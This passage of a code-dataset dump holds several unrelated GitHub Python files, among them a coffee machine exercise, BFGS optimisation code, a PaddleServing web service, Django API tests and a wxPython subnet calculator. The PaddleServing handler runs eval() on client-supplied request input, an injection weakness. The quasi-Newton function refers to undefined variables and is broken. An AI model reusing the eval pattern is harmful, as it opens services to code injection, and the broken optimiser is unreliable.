self.accept_coins(2.5):\n print(\"preparing latte:\")\n self.prepare_latte()\n self.add_profit(2.5)\n else:\n print(\"Choose something else\")\n elif user_choice == \"cappucino\":\n if self.check_avaiable_materials(water=50,milk=150,coffee=50):\n if self.accept_coins(3.0):\n print(\"Preparing cappucino\")\n self.prepare_cappucino()\n self.add_profit(3.0)\n else :\n print(\"Choose something else\")\n elif user_choice == \"espresso\":\n if self.check_avaiable_materials(water=30,coffee=50):\n if self.accept_coins(1.5):\n print(\"Preparing espresso\")\n self.prepare_espresso()\n self.add_profit(1.5)\n else :\n print(\"Choose something else\")\n elif user_choice == \"report\":\n self.report()\n continue\n else:\n print(\"Non existing option\")\n continue\n\nif __name__ == \"__main__\":\n milk_amount,water_amount,coffee_amount = [int(input(f\"Please insert amount of {material}: \")) for material in [\"milk\",\"water\",\"coffee\"]]\n coffee_machine1 = CoffeeMachine(milk=milk_amount,water=water_amount,coffee=coffee_amount)\n coffee_machine1.operate()","repo_name":"SarhadMirzakhanyan/100days","sub_path":"Day15-CoffeeMachine/coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32712357020","text":"# Next larger\n# Send Feedback\n# Given a generic tree and an integer n. Find and return the node with next larger element in the Tree i.e.\n# find a node with value just greater than n.\n# Return NULL if no node is present with the value greater than n.\n# Input Format :\n# Line 1 : Integer n\n# Line 2 : Elements in level order form separated by space (as per done in class). Order is -\n# Root_data, n (No_Of_Child_Of_Root), n children, and so on for every element\n# Output Format :\n# Node with value just greater than n.\n# Sample Input 1 :\n# 18\n# 10 3 20 30 40 2 40 50 0 0 0 0\n# Sample Output 1 :\n# 20\n# Sample Input 2 :\n# 21\n# 10 3 20 30 40 2 40 50 0 0 0 0\n# Sample Output 2:\n# 30\n# Download Test Cases\n\nclass treeNode:\n def __init__(self, data):\n self.data = data\n self.children = []\n\nmax_value_holder = 1000000\nmax_node = 1000000\ndef nextLargest(tree, n):\n global max_value_holder\n global max_node\n if tree is None:\n return\n\n if n < tree.data < max_value_holder:\n max_value_holder = tree.data\n max_node = tree\n for child in tree.children:\n max_node = nextLargest(child, n)\n\n return max_node\n\ndef createLevelWiseTree(arr):\n root = treeNode(int(arr[0]))\n q = [root]\n size = len(arr)\n i = 1\n while i epsilon * abs(dphi_zero):\n alpha_old = alpha_curr\n alpha_curr = alpha\n dphi_old = dphi_curr\n dphi_curr = np.dot(np.array(list(g.subs(list(zip(v, X + (alpha_curr * d))))), dtype=np.float), d)\n alpha = (dphi_curr * alpha_old - dphi_old * alpha_curr) / (dphi_curr - dphi_old)\n i += 1\n if i % 2 == 0:\n print(\"i={}, alpha_curr={}, alpha_old={}, alpha={}\".format(i, alpha_curr, alpha_old, alpha))\n if (i >= max) or (abs(dphi_curr) > epsilon * abs(dphi_zero)):\n return alpha\n\n def bfgs(self, f, x0, d0, g0, Q0, epslon, i, alpha):\n '''\n Broyden-Fletcher-Goldfarb-Shanno\n ..fun as callable object; must be a function of x0 and return a single number\n ..x0 as a numeric array; point from which to start\n '''\n g = Gradient(f, x0)\n if sum(abs(d0)) < epslon or i is not 0:\n Q = [self.params['hessian']['initial'] if self.params['hessian']['initial'] else np.identity(len(x0))][0]\n else:\n q = (g - g0)[np.newaxis].T\n p = (alpha * d0)[np.newaxis].T\n Q = Q0 + (1.0 + q.T.dot(Q0).dot(q) / (q.T.dot(p))) * (p.dot(p.T)) / (p.T.dot(q)) - (\n p.dot(q.T).dot(Q0) + Q0.dot(q).dot(p.T)) / (q.T.dot(p))\n d = -Q.dot(g)\n return d, g, Q\n\ndef QuasiNewton(f, max_iter, x0, epsilon):\n i = 0\n xk = x0\n norm_values = []\n\n a = np.random.random_integers(-20, 20+1, size=(2, 2))\n b = a.T\n hk = (a + b) / 2\n grad_f = Gradient(f)\n\n while i < max_iter:\n norm = np.linalg.norm(np.array(Gradient(f, xk), dtype=np.float))\n if norm < epsilon:\n break\n else:\n B_inv = np.linalg.inv(B[i])\n\n # print(grad)\n p = -np.dot(grad, B_inv)\n # print(p)\n alpha = secant_search(grad_f, x_values[i], p)\n x_values[i + 1] = x_values[i] + alpha * p\n\n del_k = np.array(x_values[i + 1] - x_values[i])\n\n #gamma_k = np.dot(del_k, grad)\n gamma_k = del_k * grad\n\n B[i + 1] = B[i] + np.dot(gamma_k.T, gamma_k) / np.dot(del_k, gamma_k) - \\\n np.dot(np.dot(gamma_k.T, del_k.T), np.dot(del_k, gamma_k))/np.dot(np.dot(del_k, gamma_k), del_k.T)\n\n norm_values.append(norm)\n i += 1\n return (x_values[i-1], norm_values[i-1])\n\n\nif __name__ == '__main__':\n x1, x2, x3 = sp.symbols('x1 x2 x3')\n k, m, n = sp.symbols('k m n', integer=True)\n f, g, h = sp.symbols('f g h', cls=sp.Function)\n sp.init_printing(use_unicode=True)\n #f = 100 * (x2 - x1 ** 2) ** 2 + (1 - x1) ** 2\n f = (x1 - 1) ** 2 + (2 - x2 ** 2) ** 2 + 4 # * (x3 - 3)**4\n v = list(ordered(f.free_symbols))\n\n print(QuasiNewton(f, 10000, [-2, 2], 0.0001))\n","repo_name":"hih84211/Optimization-Algorithms-exercises","sub_path":"p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71970544160","text":"# -*- coding: utf-8 -*-\nfrom collections import namedtuple\nimport matplotlib\n#matplotlib.use('Agg')\nimport argparse\nimport ast\nimport matplotlib.pyplot as plt\nimport numpy\n\n\ndef read_cnn_data(file_path):\n time_data = []\n acc_data = []\n ite_data = []\n results_file = open(file_path, 'rb')\n for idx, line in enumerate(results_file):\n if line.startswith(\"#\") or line == None or idx == 0:\n continue\n line = line.replace(' ', '')\n line_data = line.split('\\t')\n \n v_time = float(line_data[0])\n v_acc = float(line_data[1])\n time_data.append(v_time)\n acc_data.append(v_acc)\n ite_data.append(idx)\n results_file.close()\n time_data = numpy.asarray(time_data)\n acc_data = numpy.asarray(acc_data)\n ite_data = numpy.asarray(ite_data)\n return time_data, acc_data, ite_data\n\ndef plot_acc_vs_time(train_time, train_acc, test_time, test_acc, title, filename):\n train_time = train_time/60/60\n test_time = test_time/60/60\n plt.figure()\n plt.plot(train_time, train_acc, color=\"blue\", label='Base Treinamento')\n plt.plot(test_time, test_acc, color=\"red\", label='Base Teste')\n plt.title(title)\n plt.xlabel(u\"Tempo (horas)\")\n plt.ylabel(u\"Acurácia\")\n plt.ylim(0,100)\n plt.legend(loc='best')\n #plt.xlim(0,100)\n #plt.xlim(0.5,4.5)\n #plt.xticks(time_data)\n #plt.show()\n plt.tight_layout()\n plt.savefig(filename)\n\ndef main():\n parser = argparse.ArgumentParser(prog='cnn_visualizer.py', usage='%(prog)s [options]',\n description='Plot data', \n epilog=\"\")\n parser.add_argument('-train', '--train', help='input train file with results', required=True)\n parser.add_argument('-test', '--test', help='input test file with results', required=True)\n args = parser.parse_args()\n\n train_time, train_acc, train_ite = read_cnn_data(args.train)\n test_time, test_acc, test_ite = read_cnn_data(args.test)\n\n plot_acc_vs_time(train_time, train_acc, test_time, test_acc, u\"Tempo vs Acurácia\", 'plot.png')\n #plot_acc_vs_time(train_ite, train_acc, test_ite, test_acc)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"guidefreitas/bag_of_visual_words","sub_path":"tools/cnn_visualizer.py","file_name":"cnn_visualizer.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29354817320","text":"from paddle_serving_server.web_service import WebService, Op\nimport logging\nimport numpy as np\nfrom numpy import array\nimport sys\nimport base64\n\n_LOGGER = logging.getLogger()\nnp.set_printoptions(threshold=sys.maxsize)\n\n\nclass UciOp(Op):\n def init_op(self):\n self.separator = \",\"\n\n def preprocess(self, input_dicts, data_id, log_id):\n \"\"\"\n diff with web_server.py\n\tjavaclient input type is INDArray, restful request input is list.\n\tthis function simply reshape input to the Specified shape.\n \"\"\"\n (_, input_dict), = input_dicts.items()\n _LOGGER.error(\"UciOp::preprocess >>> log_id:{}, input:{}\".format(\n log_id, input_dict))\n proc_dict = {}\n x_value = eval(input_dict[\"x\"])\n input_dict[\"x\"] = x_value.reshape(1, 13)\n\n return input_dict, False, None, \"\"\n\n def postprocess(self, input_dicts, fetch_dict, data_id, log_id):\n _LOGGER.info(\n \"UciOp::postprocess >>> data_id:{}, log_id:{}, fetch_dict:{}\".\n format(data_id, log_id, fetch_dict))\n fetch_dict[\"price\"] = str(fetch_dict[\"price\"][0][0])\n return fetch_dict, None, \"\"\n\n\nclass UciService(WebService):\n def get_pipeline_response(self, read_op):\n uci_op = UciOp(name=\"uci\", input_ops=[read_op])\n return uci_op\n\n\nuci_service = UciService(name=\"uci\")\nuci_service.prepare_pipeline_config(\"config.yml\")\nuci_service.run_service()\n","repo_name":"PaddlePaddle/Serving","sub_path":"examples/Pipeline/simple_web_service/web_service_java.py","file_name":"web_service_java.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":848,"dataset":"github-code","pt":"54"} +{"seq_id":"22356898116","text":"a,b,x,y = map(int,input().split())\r\nif a == b:\r\n print(x)\r\n exit()\r\nif a None:\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # check the post by creating a publication\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n )\n assert response.status_code == 201\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_post_and_get_pub(\n ninja_client,\n super_user,\n publication_get_info,\n generate_basic_publications\n):\n # Check if the publication was created successfully and if the gets work\n assert ninja_client.get(\n 'publications/publications/obtener_as_admin/1',\n user=super_user\n ).json() == publication_get_info\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_accept_and_get_pub(\n ninja_client,\n super_user,\n publication_get_info,\n generate_basic_publications\n):\n # Check if the publication was created successfully and if the gets work\n assert ninja_client.get(\n 'publications/publications/obtener_as_admin/1',\n user=super_user\n ).json() == publication_get_info\n accept_publication_get_info = {**publication_get_info}\n accept_publication_get_info['is_active'] = True\n accept_publication_get_info['is_accepted'] = True\n response = ninja_client.patch(\n 'publications/publications/accept/1',\n user=super_user\n )\n assert response.status_code == 200\n assert response.json() == accept_publication_get_info\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_reject_and_get_pub(\n ninja_client,\n super_user,\n publication_get_info,\n generate_basic_publications\n):\n # Check if the publication was created successfully and if the gets work\n assert ninja_client.get(\n 'publications/publications/obtener_as_admin/1',\n user=super_user\n ).json() == publication_get_info\n assert ninja_client.delete(\n 'publications/publications/reject/1',\n user=super_user\n ).status_code == 204\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef show_all_publications(\n ninja_client,\n super_user,\n generate_basic_publications\n):\n # Accept publicatio\n assert ninja_client.get(\n '/publications/publications/all',\n user=super_user\n ).json() == [{\n 'id': 1,\n 'seller': 1,\n 'photo_uris': [_IMAGE_URI],\n 'description': 'Test description',\n 'general_item_info': {\n 'name': 'jockey',\n 'brand': 'adidas',\n 'category': {'id': 1, 'name': 'categorytest'},\n 'total_amount': 3\n }\n }]\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_category_create_delete(\n ninja_client,\n super_user,\n category_creation_info,\n category_photo_file\n):\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # get all categories\n assert ninja_client.get(\n '/publications/categories/all'\n ).json() == [category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}]\n # delete categories\n assert ninja_client.delete(\n '/publications/categories/remove/1',\n user=super_user\n ).status_code == 204\n # get empty list\n assert ninja_client.get(\n '/publications/categories/all'\n ).json() == []\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_create_invalid_item(\n ninja_client,\n user_one,\n publication_creation_info,\n publication_photo_file,\n generate_basic_publications\n):\n # create invalid publication\n wrong_pub_info = deepcopy(publication_creation_info)\n wrong_pub_info['item_brand'] = 'WrongBrand'\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(wrong_pub_info),\n },\n FILES=publication_photo_file,\n user=user_one\n ).status_code == 409\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_create_publication_with_valid_existing_item(\n ninja_client,\n super_user,\n user_two,\n user_two_creation_info,\n publication_creation_info,\n publication_photo_file,\n publication_get_info,\n generate_basic_publications\n):\n # create second user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_two_creation_info\n )\n # give new user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/2',\n user=super_user\n )\n # create valid publication with existing item\n capitalized_pub_info = deepcopy(publication_creation_info)\n capitalized_pub_info['item_brand'] = 'ADIDAS'\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(capitalized_pub_info),\n },\n FILES=publication_photo_file,\n user=user_two\n )\n assert 'publication_items' in response.json().keys()\n assert response.json()['publication_items'][0]['item'] \\\n == publication_get_info['publication_items'][0]['item']\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_wrong_field_value_publication_post(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n publication_photo_file,\n category_creation_info,\n category_photo_file,\n generate_seller_permissions\n):\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # Give empty publication items list\n empty_publication_creation_info = {**publication_creation_info}\n empty_publication_creation_info['publication_items'] = []\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(empty_publication_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n ).json() == {'errors': {'publication_items': ['List can not be empty.']}}\n # Give too long of a fied\n size_too_long_creation_info = {**publication_creation_info}\n size_too_long_creation_info['publication_items'][0]['size'] = 'a' * 64\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(size_too_long_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n )\n assert response.status_code == 400\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_duplicate_sku_in_publication_items(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n publication_photo_file,\n category_creation_info,\n category_photo_file,\n generate_seller_permissions\n):\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # Give empty publication items list\n duplicate_sku_creation_info = {**publication_creation_info}\n duplicate_sku_creation_info['publication_items'].append({\n 'size': 'S',\n 'color': 'Red',\n 'amount': 10,\n 'sku': 222\n })\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(duplicate_sku_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n ).json() == {'message': 'Duplicate sku.'}\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_get_all_existing_brands(\n ninja_client,\n generate_basic_publications\n):\n assert ninja_client.get(\n '/publications/publications/existing_brands'\n ).json() == ['adidas']\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef create_duplicate_publication(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n publication_photo_file,\n category_creation_info,\n generate_basic_publications\n):\n # Create post\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n )\n expected_error = 'Publication for items with this name and brand' \\\n + 'already exist.'\n assert response.status_code == 400\n assert response.json() == {'message': expected_error}\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef add_publication_items(\n ninja_client,\n user_one,\n publication_get_info,\n generate_basic_publications\n):\n # Add valid publication_item\n new_pub_items = [\n {'size': 'S', 'color': 'White', 'sku': 223, 'amount': 1},\n {'size': 'S', 'color': 'Red', 'sku': 224, 'amount': 1},\n ]\n # Create expected response\n new_publication_items = publication_get_info['publication_items']\n for i, info in enumerate(new_pub_items):\n new_publication_items.append({\n 'id': i + 2,\n 'publication': 1,\n 'item': {\n 'id': i + 2,\n 'name': 'jockey',\n 'brand': 'adidas',\n 'category': {'id': 1, 'name': 'categorytest'},\n 'color': info['color'],\n 'size': info['size'],\n 'sku': info['sku']\n },\n 'available': info['amount']\n })\n # Assert correct response\n add_valid_pub_item_response = ninja_client.post(\n '/publications/publications/add_publication_item/1',\n json={'publication_items': new_pub_items},\n user=user_one\n )\n assert add_valid_pub_item_response.status_code == 200\n assert add_valid_pub_item_response.status_code == publication_get_info\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef update_publications(\n ninja_client,\n user_one,\n publication_get_info,\n generate_basic_publications\n):\n # Update publication\n publication_get_info['price'] = 20000\n publication_get_info['description'] = 'new description'\n assert ninja_client.patch(\n '/pubications/publications/update_publication/1',\n json={\n 'price': publication_get_info['price'],\n 'description': publication_get_info['description']\n },\n user=user_one\n ).json() == publication_get_info\n # Update publication item\n new_amount = 10\n publication_get_info['publication_items'][0]['amount'] = new_amount\n assert ninja_client.patch(\n '/pubications/publications/update_publication_item/1',\n json={'amount': new_amount},\n user=user_one\n ).json() == publication_get_info\n # Fail invalid update\n assert ninja_client.patch(\n '/pubications/publications/update_publication_item/1',\n json={'amount': -10},\n user=user_one\n ).status_code == 400\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_upload_wrong_publication_files(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n # publication_get_info,\n category_creation_info,\n category_photo_file,\n generate_seller_permissions\n):\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # Give too many files\n publication_photo_files = MultiValueDict({\n 'files': [\n SimpleUploadedFile(f'test{i}.jpeg', b'img_data')\n for i in range(6)\n ]\n })\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=publication_photo_files,\n user=user_one\n ).status_code == 400\n # Give wrong extension\n wrong_extensions_publication_photo_files = MultiValueDict({\n 'files': [\n SimpleUploadedFile('test.txt', b'img_data')\n ]\n })\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=wrong_extensions_publication_photo_files,\n user=user_one\n )\n assert response.status_code == 400\n","repo_name":"JuanmaGuzman/Capstone_backend","sub_path":"src/publications/tests/publications_tests.py","file_name":"publications_tests.py","file_ext":"py","file_size_in_byte":16355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73077269920","text":"import sys\nimport copy\nsys.stdin = open('input.txt')\n\ntestNum = int(input())\nfor test in range(testNum):\n a = int(input())\n\n def jump(a,tmpLst,chk):\n global lst\n if a < 0:\n return\n elif a==0:\n b = copy.deepcopy(tmpLst)\n if not b in lst:\n lst.append(b)\n else:\n for i in range(3,0,-1):\n if chk > i:\n continue\n tmpLst[i-1] += 1\n chk =i-1\n jump(a-i,tmpLst,chk)\n tmpLst[i-1] -= 1\n\n\n\n ####1은 1 1개\n ####2는 1+1, 2 2개\n ####3은 1 1 1 , 1 2, 3 / 3개\n\n ########완전탐색. [0,0,0] 하고\n\n tmpLst=[0,0,0]\n lst = []\n\n k = jump(a,tmpLst,3)\n\n\n print(len(lst))","repo_name":"cmkds/algo","sub_path":"study/0917/0917.py","file_name":"0917.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74007580962","text":"import wx\nimport wx.adv\nimport wx.lib.agw.persist as pm\nfrom .SubnetCalcGUIbase import BaseCalculatorFrame, BaseSettingsFrame\nfrom .resources import *\n\n\n# ctrl-[A,C,V,X,Z], shift-insert\nctrl_ascii_chars = [\n wx.WXK_CONTROL_A, wx.WXK_CONTROL_C, wx.WXK_CONTROL_V, wx.WXK_CONTROL_X, wx.WXK_CONTROL_Z, wx.WXK_INSERT\n]\n\n\nclass SubnetCalcFrame(BaseCalculatorFrame):\n def __init__(self, *args, **kwds):\n BaseCalculatorFrame.__init__(self, *args, **kwds)\n\n # Used for dragging implementation\n self._initial_position = None\n\n self.labels = [\n self.label_broadcast, self.label_dotted, self.label_first_addr, self.label_last_addr, self.label_mask,\n self.label_network, self.label_slash, self.label_usable\n ]\n\n self.settings_window = SettingsFrame(self, name='SettingsFrame')\n\n self.text_controls = [self.text_ctrl_dotted, self.text_ctrl_mask]\n\n self.text_controls_readonly = [\n self.text_ctrl_broadcast, self.text_ctrl_first_addr, self.text_ctrl_last_addr, self.text_ctrl_network,\n self.text_ctrl_usable\n ]\n\n self.themes = {\n 'dark': {\n 'background': {'main': wx.Colour(60, 60, 60), 'text': wx.Colour(85, 85, 85)},\n 'foreground': {'main': wx.Colour(192, 192, 192), 'text': wx.Colour(232, 232, 232)}\n },\n 'light': {\n 'background': {'main': wx.Colour(238, 238, 238), 'text': wx.Colour(255, 255, 255)},\n 'foreground': {'main': wx.Colour(0, 0, 0), 'text': wx.Colour(0, 0, 0)}\n }\n }\n\n # Allow general handling of focus events for any relevant widget\n self.Bind(wx.EVT_CHILD_FOCUS, self.on_child_focus)\n\n # Allow 'minimizing' the window when pressing Escape if the frame has focus\n self.panel_main.Bind(wx.EVT_CHAR_HOOK, self.on_key)\n\n # Mouse bindings (for dragging the panel)\n self.panel_main.Bind(wx.EVT_LEFT_UP, self.on_mouse_button_up)\n self.panel_main.Bind(wx.EVT_MOTION, self.on_mouse)\n self.panel_main.Bind(wx.EVT_MOUSE_CAPTURE_LOST, self.on_mouse_lost)\n\n # Catching text input, used to automatically run conversions\n self.Bind(wx.EVT_TEXT, self.on_text, self.text_ctrl_dotted)\n self.Bind(wx.EVT_TEXT, self.on_text, self.text_ctrl_mask)\n\n # Catching individual character input, to only allow valid characters\n self.text_ctrl_dotted.Bind(wx.EVT_CHAR, self.on_char)\n self.text_ctrl_mask.Bind(wx.EVT_CHAR, self.on_char)\n\n self.text_ctrl_dotted.Bind(wx.EVT_TEXT_PASTE, self.on_paste)\n self.text_ctrl_mask.Bind(wx.EVT_TEXT_PASTE, self.on_paste)\n\n self.SetName('MainFrame')\n self.checkbox_stay_on_top.SetName('checkbox_stay_on_top')\n\n self.Center()\n\n self.persistence_manager = pm.PersistenceManager.Get()\n self.persistence_manager.SetManagerStyle(pm.PM_DEFAULT_STYLE | pm.PM_PERSIST_CONTROL_VALUE)\n\n # Restore any saved selections and window placement\n self.persistence_manager.RegisterAndRestore(self)\n self.persistence_manager.RegisterAndRestoreAll(\n self, children=[\n self.checkbox_stay_on_top, self.text_ctrl_dotted, self.spin_ctrl_mask,\n self.settings_window.radio_box_theme\n ]\n )\n\n self.apply_theme(theme_name=self.settings_window.radio_box_theme.GetStringSelection())\n\n self.select_all_text(self.text_ctrl_dotted)\n\n self.slider_mask.SetValue(self.spin_ctrl_mask.GetValue())\n\n self.stay_on_top(enable=self.checkbox_stay_on_top.IsChecked())\n\n def apply_theme(self, theme_name: str):\n theme = self.themes.get(theme_name, None)\n if not theme:\n return # TODO: consider raising an exception, especially if customization is introduced.\n\n # Main colors\n background_main = theme['background']['main']\n foreground_main = theme['foreground']['main']\n\n # Colors for normal-state TextCtrl objects\n background_text = theme['background']['text']\n foreground_text = theme['foreground']['text']\n\n self.bitmap_button_settings.SetBackgroundColour(background_main)\n self.bitmap_button_exit.SetBackgroundColour(background_main)\n\n self.checkbox_stay_on_top.SetBackgroundColour(background_main)\n self.checkbox_stay_on_top.SetForegroundColour(foreground_main)\n\n for label in self.labels:\n label.SetBackgroundColour(background_main)\n label.SetForegroundColour(foreground_main)\n\n self.panel_main.SetBackgroundColour(background_main)\n self.panel_main.SetForegroundColour(foreground_main)\n\n self.slider_mask.SetBackgroundColour(background_main)\n self.slider_mask.SetForegroundColour(foreground_main)\n\n self.spin_ctrl_mask.SetBackgroundColour(background_text)\n self.spin_ctrl_mask.SetForegroundColour(foreground_text)\n\n for text_control in self.text_controls:\n text_control.SetBackgroundColour(background_text)\n text_control.SetForegroundColour(foreground_text)\n\n for text_control in self.text_controls_readonly:\n text_control.SetBackgroundColour(background_main)\n text_control.SetForegroundColour(foreground_main)\n\n self.Refresh()\n\n # fix refresh issue for slider\n # https://stackoverflow.com/questions/24959740/wxpython-slider-background-colour-incomplete-change\n width, height = self.slider_mask.GetClientSize()\n self.slider_mask.SetClientSize((width + 1, height))\n self.slider_mask.SetClientSize((width, height))\n\n @staticmethod\n def get_clipboard_string() -> tuple:\n \"\"\"Try to get text data from the clipboard and return a tuple indicating success and the text value\"\"\"\n clipboard_string = ''\n success = False\n text_data = wx.TextDataObject()\n if wx.TheClipboard.Open():\n success = wx.TheClipboard.GetData(text_data)\n wx.TheClipboard.Close()\n if success:\n clipboard_string = text_data.GetText()\n return success, clipboard_string\n\n def on_button_exit(self, event):\n \"\"\"Save window position and settings when the user presses the button to close the application\"\"\"\n self.persistence_manager.SaveAndUnregister()\n self.Close(force=True)\n\n def on_button_settings(self, event):\n \"\"\"Open the settings window, or focus it if it's already open.\"\"\"\n if self.settings_window.IsShown():\n self.settings_window.Raise()\n else:\n self.settings_window.Show()\n self.settings_window.CenterOnParent()\n self.settings_window.radio_box_theme.SetFocus()\n\n def on_char(self, event):\n \"\"\"Allow movement and command keys in TextCtrl objects\"\"\"\n if event.IsKeyInCategory(wx.WXK_CATEGORY_NAVIGATION | wx.WXK_CATEGORY_CUT | wx.WXK_CATEGORY_TAB):\n event.Skip()\n elif event.GetKeyCode() in ctrl_ascii_chars:\n event.Skip()\n\n def on_checkbox_stay_on_top(self, event):\n self.stay_on_top(event.IsChecked())\n event.Skip()\n\n def on_child_focus(self, event):\n \"\"\"Allows general handling of focus events for different types of widgets throughout the program\"\"\"\n event_object = event.GetEventObject()\n if isinstance(event_object, wx.TextCtrl):\n self.select_all_text(event_object)\n else:\n event.Skip()\n\n def on_key(self, event):\n \"\"\"Minimize (iconize) the window on escape key\"\"\"\n if event.GetKeyCode() == wx.WXK_ESCAPE:\n self.Iconize()\n else:\n event.Skip()\n\n def on_mouse(self, event):\n \"\"\"Implement click-and-drag for the frame/panel\"\"\"\n if not event.Dragging():\n # Panel is not being dragged, reset and bail\n self._initial_position = None\n return\n if not self.panel_main.HasCapture():\n # In Drag event, make sure we capture the mouse\n self.panel_main.CaptureMouse()\n if not self._initial_position:\n # Panel is being dragged, store current position\n self._initial_position = event.GetPosition()\n else:\n # Panel is being dragged and we already have a previous position, move the window\n new_position = event.GetPosition()\n delta = self._initial_position - new_position\n self.SetPosition(self.GetPosition() - delta)\n\n def on_mouse_button_up(self, event):\n \"\"\"Makes sure the mouse gets released from dragging\"\"\"\n if self.panel_main.HasCapture():\n self.panel_main.ReleaseMouse()\n\n def on_mouse_lost(self, event):\n \"\"\"This function can be used to abort anything relying on mouse input.\"\"\"\n pass\n\n def on_paste(self, event) -> tuple:\n \"\"\"This will get the value from the clipboard and return a success indicator and string in a tuple\"\"\"\n return self.get_clipboard_string()\n\n def on_slider(self, event):\n slider_value = event.GetInt()\n self.spin_ctrl_mask.SetValue(slider_value)\n\n def on_spinctrl(self, event):\n spin_value = event.GetInt()\n self.slider_mask.SetValue(spin_value)\n\n def on_text(self, event):\n print(\"Event handler 'on_text' not implemented!\")\n event.Skip()\n\n def reset_results(self):\n for text_control in self.text_controls_readonly:\n text_control.ChangeValue('')\n\n def select_all_text(self, text_control):\n wx.CallAfter(text_control.SetInsertionPointEnd)\n wx.CallAfter(text_control.SelectAll)\n\n def stay_on_top(self, enable: bool = True):\n if enable:\n # Binary OR wx.STAY_ON_TOP to add it if it's not already present\n self.SetWindowStyle(self.GetWindowStyle() | wx.STAY_ON_TOP)\n else:\n # Binary XOR wx.STAY_ON_TOP to remove it if it is present\n self.SetWindowStyle(self.GetWindowStyle() ^ wx.STAY_ON_TOP)\n\n\nclass 